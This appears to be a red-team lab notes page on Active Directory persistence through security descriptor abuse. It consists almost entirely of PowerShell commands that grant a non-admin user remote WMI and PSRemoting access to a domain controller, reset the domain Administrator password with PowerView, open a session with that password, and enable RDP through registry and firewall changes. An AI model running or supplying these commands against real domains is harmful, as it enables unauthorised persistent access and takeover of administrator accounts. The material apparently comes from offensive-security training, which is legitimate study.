Persistence ACLs - Security Descriptors
Need DA
Security Descriptors
#Need DA
Import-Module Set-RemoteWMI
Import-Module Set-RemotePSRemoting.ps1
#On Local Machine for Student529 or your current user
Set-RemoteWMI -UserName student529 -Verbose
#On Remote Machine without Credentials
Set-RemoteWMI -UserName student529 -Verbose -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -Verbose -ComputerName dcorp-dc -Verbose
#On Remote Machine without Credentials
Set-RemoteWMI -UserName student529 -Verbose -ComputerName dcorp-dc -Credential Administrator -namespace 'root\cimv2' -Verbose
Set-RemotePSRemoting -UserName student529 -Verbose -ComputerName dcorp-dc -Credential Administrator
#On Remote Machine remove permissions
Set-RemoteWMI -UserName student529 -ComputerName dcorp-dc–namespace 'root\cimv2' -Remove -Verbose
#verify that we have access and can execute command with WMI
#Open Powershell with student529 non-admin user
Get-Wmiobject -Class Win32_operatingsystem -Computername dcorp-dc
----------Abuse WMI-----
#If we excuted Set-RemotePSRemoting.ps1, we can now use invoke-command:
#Open Powershell with student529 non-admin user
Invoke-command -ScriptBlock{whoami /priv} -ComputerName dcorp-dc
Import-Module .\PowerView_dev.ps1
Set-DomainUserPassword -Identity Administrator -AccountPassword (ConvertTo-SecureString "Password@1234" -AsPlainText -Force) -Verbose
#Enter Session with new password
Enter-PSSession –Computername dcorp-dc –credential dcorp\Administrator
----------#Extra-------
#Enable Remote Desktop
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
#Activate the firewall rule
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
#Enable authentication via RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1Security Descriptors - Remote Registry
Last updated
Was this helpful?